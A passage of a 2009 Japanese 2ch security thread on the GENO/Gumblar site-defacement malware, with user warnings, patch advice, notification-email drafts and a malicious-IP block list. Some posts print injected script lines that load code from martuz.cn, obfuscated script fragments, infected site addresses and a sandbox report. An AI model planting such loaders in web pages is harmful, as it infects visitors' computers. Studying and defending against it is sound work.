最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・
みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。
それだと、イタズラに思われるかな?
121:192.168.0.774
09/05/17 13:25:33 5zpzhS0v0
>>120
なんかスパムメールみたいに見えるなぁ
どうしたもんかね
122:192.168.0.774
09/05/17 13:26:25 7TaPV4fL0
まさか、人に文を読ませるために考えることになるとは思わなかったなw
123:192.168.0.774
09/05/17 13:27:17 T9pTie3x0
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
124:192.168.0.774
09/05/17 13:27:52 ytTR6LEA0
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
URLリンク(itpro.nikkeibp.co.jp)
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
URLリンク(www.itmedia.co.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
URLリンク(www.so-net.ne.jp)
セキュリティ通信|セキュリティ関連ニュース バックナンバー
正規サイト改ざん(3) ウイルスに感染しないための対策
URLリンク(www.so-net.ne.jp)
もし、メールを送るのなら、これもつけておくと吉かも。
125:192.168.0.774
09/05/17 13:27:59 rsI8zkAT0
>>121
スパム吹いた
もうそんな風にしかみえなくなったじゃないかw
126:192.168.0.774
09/05/17 13:29:09 77O8s7yk0
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
127:192.168.0.774
09/05/17 13:29:42 0CtfCDPI0
>>111
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
128:192.168.0.774
09/05/17 13:31:22 fQ7GRX9bO
>>121
典型的なスパム文だわな
初めに誰もが知ってる大手の名前を出して注意をひくところが
難しいねぇ
129:192.168.0.774
09/05/17 13:32:13 T9pTie3x0
御社のHPを拝見した所、ウイルスを検出しました。
HPが改変されています。
これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so-netのURL
ご対応の程、宜しくお願い申し上げます。
尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL
↑こんなんでどうでしょ
130:192.168.0.774
09/05/17 13:34:14 Sggs+C2i0
正規のプロバイダメールで出せばどうなのかな?
ヘッダを見たらスパムメールじゃない事が分かるし
131:192.168.0.774
09/05/17 13:35:58 77O8s7yk0
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
132:192.168.0.774
09/05/17 13:36:03 CRVJI+EQ0
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
133:192.168.0.774
09/05/17 13:36:15 T9pTie3x0
店舗のメアドに送るならヘッダすら見ないと思うし
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
134:192.168.0.774
09/05/17 13:36:20 ilxyL7Fy0
わたしの主人がオオアリクイに~(以下略) みたいなタイトルで送るとか。(余計にスパムだなw)
ま、冗談はさておき
1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
(どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
→感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
(これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
135:192.168.0.774
09/05/17 13:36:50 uL9xj+2n0
>>129
非常勤の親父「また迷惑メールか削除削除・・・」
136:192.168.0.774
09/05/17 13:36:57 K2sBx0VP0
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする
「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」
とかなんとか
137:192.168.0.774
09/05/17 13:37:27 Um/4qeYR0
【速報】虹裏感染の疑い
138:192.168.0.774
09/05/17 13:37:57 T9pTie3x0
>>135
あるなwww
ここまで簡単に書いてもそれなら
もうそれはしょうがないよ
GENOの担当者は結局無反応だったよね?
139:192.168.0.774
09/05/17 13:38:09 mJUiMCyk0
複数名から違う文章で送れば 対応してくれんかなあ
140:192.168.0.774
09/05/17 13:39:11 ilxyL7Fy0
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに
相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
落ちてしまう。…ということも伝えたいがどうしたもんか。
141:192.168.0.774
09/05/17 13:39:34 77O8s7yk0
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
142:192.168.0.774
09/05/17 13:39:58 T9pTie3x0
>>139
なんだ急に変なメール増えたな・・・削除削除(´・ω・)
レン鯖に連絡した方がいいんじゃね?
まぁ一軒潰した所で(ry
143:192.168.0.774
09/05/17 13:41:26 ilxyL7Fy0
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
144:192.168.0.774
09/05/17 13:43:33 um/XFnMU0
もうこれぐらい挑発的なので良いんじゃないか?
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで
貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。
p.s. 対策に関してはググレ
管理できないホームページなら閉鎖しろ糞管理人
145:192.168.0.774
09/05/17 13:44:37 T9pTie3x0
てめーこのやろー
ページ開いたらパソコンばっ壊れたじゃねーか
さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
146:192.168.0.774
09/05/17 13:48:45 mJUiMCyk0
replica08■web■fc2■com/index■html
感染
147:192.168.0.774
09/05/17 13:49:06 +iVGXmeP0
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
URLリンク(www.adobe.com)
ダウンロード
URLリンク(get.adobe.com)
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
URLリンク(get.adobe.com)
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]
(´・ω・`)らんらん♪
148:192.168.0.774
09/05/17 13:49:47 T9pTie3x0
感染ってどうやって見つけてるの?
149:192.168.0.774
09/05/17 13:51:26 yMbOeyMJ0
>>147
(´・ω・`)らん豚帰れよ
150:192.168.0.774
09/05/17 13:54:23 RrqXiVyA0
avastとバスター2009の同居ってやっぱだめ?
151:192.168.0.774
09/05/17 13:55:57 iagHZf1s0
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
152:192.168.0.774
09/05/17 13:57:46 77O8s7yk0
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
153:192.168.0.774
09/05/17 13:58:36 RrqXiVyA0
>>152
だよね
バスター常時待機でときたまavastで検索って感じがいいかな?
154:192.168.0.774
09/05/17 14:00:18 0CtfCDPI0
成美堂出版 → martuz.cn
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
155:192.168.0.774
09/05/17 14:00:38 2KRNOGSH0
俺スパマーになれんのか?あっはは。
>>146のIP 208.71.106.38
>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1~Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00~12:00、13:30~17:00
>>151
参考にさせてもらいます。
156:192.168.0.774
09/05/17 14:04:21 1tk6kEt+0
>>93
Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
157:192.168.0.774
09/05/17 14:05:24 LQE1Ao+t0
「5.危険IPのブロック」の方法がわからないのですが、教えてくれませんか?
158:192.168.0.774
09/05/17 14:08:44 1tk6kEt+0
>>157
セキュリティソフトでブロックする方法とルータでブロックする方法がある。
とりあえずルータの有無と使用しているセキュリティソフトを書いて。
159:192.168.0.774
09/05/17 14:09:06 TTgW4pHv0
>>64
GENOウィルスチェッカーだとひっかがらんよ
チェッカーは、まだだめみたいね
160:192.168.0.774
09/05/17 14:09:07 77O8s7yk0
>>157
他の対策は済んだのか? 先にそっちをやっていれば5.に関してはそれほど神経質にならなくていい。
これからもソフトのアップデート情報には注意してください。
161:192.168.0.774
09/05/17 14:10:30 T9pTie3x0
これも一応置いとく
前スレか何処かに落ちてた
URLリンク(www.dotup.org)
パスはGENO
162:192.168.0.774
09/05/17 14:13:51 LQE1Ao+t0
>>158 ルーターは NEC Aterm WR8500N セキュリティソフトはavast!です。
>>160 他のはすべて終わっています。一応念のためにも、と
163:192.168.0.774
09/05/17 14:18:21 G0FsAaa+0
御社のHPがウィルスに感染し、改竄されております。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。
被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。
以下このウィルスについての説明を添えさせていただきます。
---
こんな感じで以下>>109路線の文章を貼り付けるのはどうだろう
読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが>>120路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする
・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!
ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
164:192.168.0.774
09/05/17 14:20:24 77O8s7yk0
どうせ休日明けまで対処はないし、出社したら状況は把握するだろ。
165:blocktxt
09/05/17 14:24:07 6zykGUMd0
一行だけですけど95.129.144.0-95.129.145.255
追加しておきました。教えて君が増えるのでパス付けました。
パスは zlkonの2009/04/27(月)時点の○○○○○個数
住人ならわかるはず、CIDRはありません・・・変換マンドクセ
URLリンク(www.rupan.net)
166:192.168.0.774
09/05/17 14:24:30 ilxyL7Fy0
>>156
TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。
実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8~9割は検知してましたが、昨日拾った検体の中での話)
Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
167:192.168.0.774
09/05/17 14:26:27 2KRNOGSH0
>>163
それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると~に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
168:192.168.0.774
09/05/17 14:29:35 2KRNOGSH0
あっちのスレが終わりそうだが、こっちに来る気か?
169:192.168.0.774
09/05/17 14:30:17 1tk6kEt+0
>>162
Avast!にはファイヤーウォール機能がないから、ファイヤーウォールアプリを
入れてブロックするIPを設定するか、ルータのIPフィルタリング機能を使う。
ルータの場合、
URLリンク(www.aterm.jp)
を参考に。
170:192.168.0.774
09/05/17 14:30:29 VGi2lcCh0
>>166
いくつか晒されたスクリプトを見る限りだとUA偽装も多少は有効そうなんだが、
実際のところはどうなんだろう。
まぁ条件式変えられる可能性が高いから安全とは全然言いがたいが。
171:本スレ誘導
09/05/17 14:33:19 789Se66x0
>1
乱立すんな死ね!!!!!!!!!!!!!!!!!!!
本スレはこっちな
GENOウイルススレ ★11
スレリンク(sec板)
172:192.168.0.774
09/05/17 14:34:02 VCQZY8+a0
お前ら落ち着け!今は争ってる場合じゃない!
173:192.168.0.774
09/05/17 14:34:27 ov4CW62y0
>>165
gumbか、入ってた。
スレリンク(sec板:239-240番)
174:192.168.0.774
09/05/17 14:34:39 Sggs+C2i0 BE:508226292-S★(636363)
>>239
avastはファイアウォールがついてないのでそちらの方の対策は大丈夫ですか?
もし、対策されていたら余計なお世話ですみません。
175:192.168.0.774
09/05/17 14:35:26 Sggs+C2i0 BE:451757344-S★(636363)
>>174
すみません失礼しました。誤爆しました。
176:192.168.0.774
09/05/17 14:35:36 ilxyL7Fy0
Avast常駐中に「JS:Redirector-H ~ JS:Redirector-H9」か、類似の名称で検知した場合は
zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。
JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は
手元の検体で確認済み。
177:192.168.0.774
09/05/17 14:35:36 Ts61gYp70
お前意地張ってないで
本スレ見た方がいいぞ
今あっちでは双葉ちゃんねるが感染したって騒ぎになってるから
178:192.168.0.774
09/05/17 14:35:40 LQE1Ao+t0
>>169 おおどうもです。そんなサイト探してました。とりあえずルーター設定でやってみます。
179:192.168.0.774
09/05/17 14:36:01 1l1Ze1DVP
どこが本スレだよ
教えやがれ奴隷ども
180:192.168.0.774
09/05/17 14:36:07 1tk6kEt+0
>>166
なるほど。了解。
そこまでやってなかったわ。
181:192.168.0.774
09/05/17 14:36:34 ov4CW62y0
>>173
ごめん、1行目コピペ忘れてたは
182:192.168.0.774
09/05/17 14:37:31 zd6xXlce0
>>179
奴隷スレ
スレリンク(soccer板)
183:192.168.0.774
09/05/17 14:37:46 VCQZY8+a0
取り敢えずうちのPCは感染していない事が判ったので
俺はバスターの対応を待つ
それまでPCではここと2ちゃんしかみない
ミクシィも携帯のみにするわ
184:192.168.0.774
09/05/17 14:41:08 LQE1Ao+t0
[セキュリティ版]GENOウイルススレ ★10でID表示される掲示板が良いと言う事になって、
こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
185:192.168.0.774
09/05/17 14:41:19 YGxJUpFP0
すみません少しテンパってます、知恵を貸してください
スレチなら誘導して頂けると幸いです
普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意
↓
インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動
↓
何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\
↓
辛うじて記憶していたショートカットでタスクマネージャ起動
↓
新しいタスクの実行から専ブラ起動←今ココ
テンプレの症状で確認できていたのは以下のみ
①cmd.exe、regedit.exeが起動しない
②sqlsodbc.chmのファイルサイズがおかしい
CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです
リカバリするにも何処から仕掛けて良いのやらorz
186:192.168.0.774
09/05/17 14:41:40 ilxyL7Fy0
>>156
あったあった。
昨日検体提出時点(0/40)
URLリンク(www.virustotal.com)
今、再確認したけど、やっぱりスルー(0/40)
URLリンク(www.virustotal.com)
アドレスはこれかな
sound■jp/yudai_marimba/
他にも2つ位、Avastスルーだけどしっかりスクリプトが挿入されているページがありました。
1つ出てきたから、あとはもういいか。
昨日の時点で入っていたもの。
|<script language=javascript><!--
|(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_<以下略>
| --></script>
187:192.168.0.774
09/05/17 14:42:16 VPbnNWIB0
>>185
感染確定
188:192.168.0.774
09/05/17 14:44:04 weq4pQS+0
スレを見てたらブラウザがウイルスに感染した、みたいなの出てきたがこれは違うやつか
189:192.168.0.774
09/05/17 14:44:33 um/XFnMU0
>>185
ご愁傷様でした。
とっととクリーンインスコしてください
190:192.168.0.774
09/05/17 14:46:16 q8u6cZFi0
>>185
どっから感染したんだろう…
余裕でアウトだな
191:192.168.0.774
09/05/17 14:47:07 MpyKmePW0
>>188
関係ない
つ「ノートントラップ」
192:192.168.0.774
09/05/17 14:47:55 weq4pQS+0
あんまり興味なかったからノートンでもavastでもなくてAVGなんだが
193:192.168.0.774
09/05/17 14:48:20 NFeyfEj00
Adobe ReaderとFlash Playerを最新のにしたんですが
Javascriptとかはよく分からないので放置してます。
とりあえず最新版使ってればセキュリティーホール突かれることもなく
安全なんですよね?
194:192.168.0.774
09/05/17 14:49:33 um/XFnMU0
今はね
195:192.168.0.774
09/05/17 14:49:42 1tk6kEt+0
>>186
おお、さんきゅ。
早速踏んでみたが、確かにAvast!無反応だな。
どういうロジックでAvast!は判定してるんだろ?
unescapeを解読してるわけじゃないってことか。
196:192.168.0.774
09/05/17 14:50:55 YpVuMiqJ0
avastからAviraAntivirに乗り換えた途端にavastが本気出してきて乗り換えたくなってきたぜ
197:192.168.0.774
09/05/17 14:51:32 77O8s7yk0
>>193
まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
198:192.168.0.774
09/05/17 14:53:04 Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの?
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/
199:192.168.0.774
09/05/17 14:53:06 z5ZKMxe60
hxxp://www.ukokkei.co.jp/company/index.html
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail info@ukokkei.co.jp
じゃだめなん?
200:192.168.0.774
09/05/17 14:53:27 7Fj5Ju7c0
>>186
F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
201:192.168.0.774
09/05/17 14:54:44 7TaPV4fL0
急に流れが速くなったな
202:192.168.0.774
09/05/17 14:54:47 buHp3trp0
セキュリティソフトの会社って自作自演とかしてるの?
自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
203:192.168.0.774
09/05/17 14:55:02 OUF99NvG0
Adobe Reader9.1.1公開日が5/13
今回GENOウイルスがターゲットにした脆弱性は
このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
204:192.168.0.774
09/05/17 14:55:15 YGxJUpFP0
>>185です
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・
CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
205:192.168.0.774
09/05/17 14:55:24 t97Zp0ei0
>>202
お前頭いいな
206:192.168.0.774
09/05/17 14:57:32 VPbnNWIB0
>>204
機種名ぐらいかけ
207:192.168.0.774
09/05/17 14:58:26 ov4CW62y0
>>203
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
208:192.168.0.774
09/05/17 14:58:50 MpyKmePW0
>>204
タスクマネージャいけるなら
新しいタスクの実行→explorer
でタスクバーとか出るんじゃね
209:192.168.0.774
09/05/17 14:59:32 ilxyL7Fy0
>>200
提出済みです。
210:192.168.0.774
09/05/17 14:59:44 YpVuMiqJ0
>>202
それは結構前から言われてる事、本当かどうかは知らん
211:192.168.0.774
09/05/17 15:00:06 6zykGUMd0
>>198
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212:192.168.0.774
09/05/17 15:01:05 ybsV4IQS0
ファイアフォックス使ってんだけど
弾いてくれたから大丈夫って感じなの?
213:192.168.0.774
09/05/17 15:01:34 Z6bHwWLb0
>>193と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
214:192.168.0.774
09/05/17 15:01:45 7TaPV4fL0
そういや、3週間前にFirefoxやJane Styleのログが
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
215:192.168.0.774
09/05/17 15:02:35 QQBuyEr/0
ブラウザのJavascriptを切るってどうやればいいの?
216:192.168.0.774
09/05/17 15:02:39 DKlwM8ZhP
>>207
以前じゃなくて以降なのか?
217:192.168.0.774
09/05/17 15:02:47 7TaPV4fL0
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
218:192.168.0.774
09/05/17 15:03:21 ov4CW62y0
>>216
ごめん、以降は別の脆弱性修正ver
219:192.168.0.774
09/05/17 15:04:09 ilxyL7Fy0
検出可否スレより最新情報を転記
最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。
martuz_cn_id2_20090517.pdf
MD5 :3cdbaee0c533809e43c6b815884763ff
URLリンク(www.virustotal.com) (2/40)
martuz_cn_id10_20090517.exe
MD5 :b0ca69853b371ec9eb58829e869f6f10
URLリンク(www.virustotal.com) (3/40)
220:192.168.0.774
09/05/17 15:06:25 2kKhzap+0
>>218
もちつけ
221:192.168.0.774
09/05/17 15:06:50 HpOylDYR0
USBメモリでも感染る?
222:192.168.0.774
09/05/17 15:07:36 OUF99NvG0
>>207
サンクス
ということは3月のアップデートをきっちりしておけば
こいつに関してはとりあえずOKということだね
223:192.168.0.774
09/05/17 15:07:41 DKlwM8ZhP
>>218
そういう意味か
脆弱性復活したのかと思ったw
224:212
09/05/17 15:07:54 ybsV4IQS0
ちょwww誰か教えてくださいwww
このままじゃトイレにもいけねぇ
225:192.168.0.774
09/05/17 15:09:26 +t63J1Bn0
本スレ見てきたんだが、なんかもうGENO付きURL配布とかしてるし
感染は拡大する一方だな
俺なりにまとめてみた
URLリンク(geocities.com)
追加あったら気軽に書いてくれ
226:192.168.0.774
09/05/17 15:10:34 7yrlZLjk0
>>224
かけちゃえかけちゃえ
227:192.168.0.774
09/05/17 15:10:37 yV8RyIy+0
>>185
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
228:192.168.0.774
09/05/17 15:10:57 xLw+W3X80
>>219
検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
229:192.168.0.774
09/05/17 15:11:55 BvZF1aRY0
最新版に更新しても新種が出るかもしれないから安心できないお……
だからadobe削除したお!
230:192.168.0.774
09/05/17 15:12:17 NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231:212
09/05/17 15:12:25 ybsV4IQS0
┃
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 ) >>226
┃ (___)
232:185
09/05/17 15:16:45 YGxJUpFP0
>>206
WinXPSP3って機種名ではないのでしょうか?
メーカーはマウスです
>>208
ありがとうございます!バー出ました
只今、先生に相談しながらクリーンインストールに挑戦中です
233:192.168.0.774
09/05/17 15:17:56 6zykGUMd0
URLリンク(www3.atword.jp)?とおもったら/
234:192.168.0.774
09/05/17 15:19:02 BSZ5z9KU0
Adobe Readerは9.1.1が最新型じゃないの?
235:192.168.0.774
09/05/17 15:19:05 +Enx2Z7OP
クリーンインストールって面倒なん?
236:192.168.0.774
09/05/17 15:22:35 zPBL8LWuO
>>235
時間かかるし
データも真っ白になるよ
237:192.168.0.774
09/05/17 15:22:38 2KRNOGSH0
>>225
良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
238:192.168.0.774
09/05/17 15:24:42 7TaPV4fL0
AdobeのFlashとReaderを最新にしていたら
感染サイトを踏んでも大丈夫という情報を広めてきます。
239:192.168.0.774
09/05/17 15:29:08 /4yp3BhL0
2ちゃんの専ブラはだいじょうぶなんかねぇ。
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
240:192.168.0.774
09/05/17 15:30:27 7TaPV4fL0
URLは極力踏まないようにすればいいよ
241:192.168.0.774
09/05/17 15:30:42 gvZ9d8TtP
ソフ板も見るといいよ
242:192.168.0.774
09/05/17 15:31:20 rsI8zkAT0
>>239
専ブラは平気
243:192.168.0.774
09/05/17 15:32:26 Dx3JCXno0
>>241
URLを張っていただくとありがたい
244:192.168.0.774
09/05/17 15:33:07 Z6bHwWLb0
>>242
IEコンポーネントでも?
245:192.168.0.774
09/05/17 15:33:15 gvZ9d8TtP
ソフトウェア
URLリンク(pc12.2ch.net)
普通ここまでしない
246:192.168.0.774
09/05/17 15:34:25 1tk6kEt+0
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
247:192.168.0.774
09/05/17 15:35:11 Dx3JCXno0
>>245
ありです
248:192.168.0.774
09/05/17 15:35:31 7TaPV4fL0
そりゃないよ
249:192.168.0.774
09/05/17 15:37:28 vH8KoEBz0
>>237見てまともなリンク先かと思って225踏んじまったじゃねーかw
250:192.168.0.774
09/05/17 15:43:52 7yrlZLjk0
>>246
むしろフラッシュを使わないで欲しい
251:192.168.0.774
09/05/17 15:48:45 7TaPV4fL0
うぉっかないなぁ
252:192.168.0.774
09/05/17 15:49:21 6zykGUMd0
アクセス制限中です。しばらく経ってからアクセスしてください。
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ
チェッカー ><
253:192.168.0.774
09/05/17 15:59:54 MP/sWvjo0
GENOウイルスチェッカー
今入ってるけど まさか俺のせいじゃないよね。
254:192.168.0.774
09/05/17 16:00:53 ilxyL7Fy0
>>219
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
